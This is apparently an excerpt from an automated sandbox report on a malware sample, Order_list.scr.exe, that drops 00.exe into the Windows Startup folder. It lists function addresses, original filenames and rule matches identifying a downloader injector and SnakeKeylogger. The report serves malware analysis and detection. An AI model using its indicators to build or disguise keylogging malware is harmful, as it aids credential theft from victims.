Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAD670	3_2_05DAD670
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA8608	3_2_05DA8608
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAC9C8	3_2_05DAC9C8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA85FC	3_2_05DA85FC
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA5198	3_2_05DA5198
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA1191	3_2_05DA1191
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA518B	3_2_05DA518B
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA81B0	3_2_05DA81B0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA11A0	3_2_05DA11A0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA81A0	3_2_05DA81A0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA7D58	3_2_05DA7D58
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA0D48	3_2_05DA0D48
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA7D48	3_2_05DA7D48
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA7900	3_2_05DA7900
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA0D39	3_2_05DA0D39
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DABD28	3_2_05DABD28
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA08F0	3_2_05DA08F0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA78F0	3_2_05DA78F0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA08E0	3_2_05DA08E0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA0498	3_2_05DA0498
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA7497	3_2_05DA7497
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA0488	3_2_05DA0488
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAB08F	3_2_05DAB08F
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA74A8	3_2_05DA74A8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA0040	3_2_05DA0040
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA7040	3_2_05DA7040
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA2818	3_2_05DA2818
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAD018	3_2_05DAD018
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA0007	3_2_05DA0007
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA2807	3_2_05DA2807
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA4430	3_2_05DA4430
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA6BD0	3_2_05DA6BD0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA6BC1	3_2_05DA6BC1
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAA3F8	3_2_05DAA3F8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA33B8	3_2_05DA33B8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA33A8	3_2_05DA33A8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA6778	3_2_05DA6778
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAC378	3_2_05DAC378
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA676B	3_2_05DA676B
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA6311	3_2_05DA6311
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA3730	3_2_05DA3730
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA6320	3_2_05DA6320
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAB6D9	3_2_05DAB6D9
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA5EC8	3_2_05DA5EC8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA5EB8	3_2_05DA5EB8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAAA48	3_2_05DAAA48
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA5A70	3_2_05DA5A70
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAD662	3_2_05DAD662
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA5A60	3_2_05DA5A60
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA5618	3_2_05DA5618
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA5609	3_2_05DA5609
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 5_2_027325D8	5_2_027325D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 5_2_0273D304	5_2_0273D304
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 5_2_04E465B0	5_2_04E465B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 5_2_04E4B358	5_2_04E4B358
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 5_2_04E40040	5_2_04E40040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 5_2_04E40006	5_2_04E40006
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 5_2_04E457F1	5_2_04E457F1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AF018	8_2_009AF018
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AC196	8_2_009AC196
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009A6118	8_2_009A6118
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AB328	8_2_009AB328
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AC470	8_2_009AC470
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009A3580	8_2_009A3580
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AC752	8_2_009AC752
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009A9858	8_2_009A9858
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009A4AD9	8_2_009A4AD9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009ACA32	8_2_009ACA32
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009ABBD2	8_2_009ABBD2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009ABEB6	8_2_009ABEB6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AF007	8_2_009AF007
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AB4F2	8_2_009AB4F2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AE517	8_2_009AE517
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_009AE528	8_2_009AE528
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06328460	8_2_06328460
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06327D90	8_2_06327D90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06323870	8_2_06323870
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06320040	8_2_06320040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063211C0	8_2_063211C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632C638	8_2_0632C638
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632F610	8_2_0632F610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632F600	8_2_0632F600
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632C648	8_2_0632C648
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632CEF8	8_2_0632CEF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632CEEA	8_2_0632CEEA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06326F13	8_2_06326F13
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632D7A8	8_2_0632D7A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632D798	8_2_0632D798
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06326F8B	8_2_06326F8B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063237E8	8_2_063237E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632DC00	8_2_0632DC00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632E4B0	8_2_0632E4B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063204A0	8_2_063204A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632E4A0	8_2_0632E4A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06320490	8_2_06320490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632B4E8	8_2_0632B4E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632B4D7	8_2_0632B4D7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06320D60	8_2_06320D60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632ED60	8_2_0632ED60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632ED50	8_2_0632ED50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06320D51	8_2_06320D51
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632BD98	8_2_0632BD98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632BD88	8_2_0632BD88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632FA68	8_2_0632FA68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632FA59	8_2_0632FA59
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632CAA0	8_2_0632CAA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632D350	8_2_0632D350
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632D340	8_2_0632D340
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632DBF1	8_2_0632DBF1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063273E8	8_2_063273E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063273D8	8_2_063273D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632001E	8_2_0632001E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06323860	8_2_06323860
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632E058	8_2_0632E058
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632E049	8_2_0632E049
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063208F0	8_2_063208F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632E8F8	8_2_0632E8F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632B930	8_2_0632B930
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06320900	8_2_06320900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632E908	8_2_0632E908
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632B940	8_2_0632B940
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063211B0	8_2_063211B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632F1B8	8_2_0632F1B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632F1A9	8_2_0632F1A9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632C1F0	8_2_0632C1F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0632C1E0	8_2_0632C1E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06358608	8_2_06358608
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635D670	8_2_0635D670
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635AA58	8_2_0635AA58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635B6E8	8_2_0635B6E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635C388	8_2_0635C388
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635D028	8_2_0635D028
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635A408	8_2_0635A408
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06358C60	8_2_06358C60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635B0A0	8_2_0635B0A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635BD38	8_2_0635BD38
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063511A0	8_2_063511A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635C9D8	8_2_0635C9D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635322A	8_2_0635322A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06355618	8_2_06355618
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06358602	8_2_06358602
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635560A	8_2_0635560A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06355A70	8_2_06355A70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06355A60	8_2_06355A60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635D662	8_2_0635D662
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635F26C	8_2_0635F26C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635AA48	8_2_0635AA48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635F2B3	8_2_0635F2B3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06355EB8	8_2_06355EB8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635F2FF	8_2_0635F2FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635B6D9	8_2_0635B6D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06355EC8	8_2_06355EC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06353730	8_2_06353730
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06356320	8_2_06356320
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06353720	8_2_06353720
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06356312	8_2_06356312
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06356778	8_2_06356778
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635C378	8_2_0635C378
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06358B58	8_2_06358B58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063533B8	8_2_063533B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063533A8	8_2_063533A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635A3F8	8_2_0635A3F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06356BD0	8_2_06356BD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06356BC1	8_2_06356BC1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06354430	8_2_06354430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06354420	8_2_06354420
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635F42E	8_2_0635F42E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635D018	8_2_0635D018
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06352807	8_2_06352807
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06350006	8_2_06350006
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06352809	8_2_06352809
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06357050	8_2_06357050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06350040	8_2_06350040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06357049	8_2_06357049
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063528B0	8_2_063528B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063574A8	8_2_063574A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06357497	8_2_06357497
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06350498	8_2_06350498
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635B08F	8_2_0635B08F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06350488	8_2_06350488
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063508F0	8_2_063508F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063578F0	8_2_063578F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635F0E6	8_2_0635F0E6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063508E0	8_2_063508E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06350D39	8_2_06350D39
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635BD28	8_2_0635BD28
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06357900	8_2_06357900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06357D58	8_2_06357D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06350D48	8_2_06350D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06357D48	8_2_06357D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063581B0	8_2_063581B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_063581A0	8_2_063581A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06351191	8_2_06351191
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_06355198	8_2_06355198
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635518A	8_2_0635518A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 8_2_0635C9C8	8_2_0635C9C8

Source: Order_list.scr.exe, 00000000.00000002.4142462023.0000000002611000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Order_list.scr.exe
Source: Order_list.scr.exe, 00000000.00000002.4142462023.0000000002611000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Order_list.scr.exe
Source: Order_list.scr.exe, 00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs Order_list.scr.exe
Source: Order_list.scr.exe, 00000000.00000002.4164055265.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs Order_list.scr.exe
Source: Order_list.scr.exe, 00000000.00000002.4137589994.000000000094E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Order_list.scr.exe
Source: Order_list.scr.exe, 00000000.00000002.4171576105.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Order_list.scr.exe
Source: Order_list.scr.exe, 00000000.00000000.1676222262.0000000000242000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFisa.exe* vs Order_list.scr.exe
Source: Order_list.scr.exe, 00000003.00000002.4136341047.00000000011D7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Order_list.scr.exe
Source: Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Order_list.scr.exe
Source: Order_list.scr.exe	Binary or memory string: OriginalFilenameFisa.exe* vs Order_list.scr.exe

Source: Order_list.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Order_list.scr.exe.29590ec.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.Order_list.scr.exe.4d40000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Order_list.scr.exe.4d40000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.Order_list.scr.exe.3668570.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
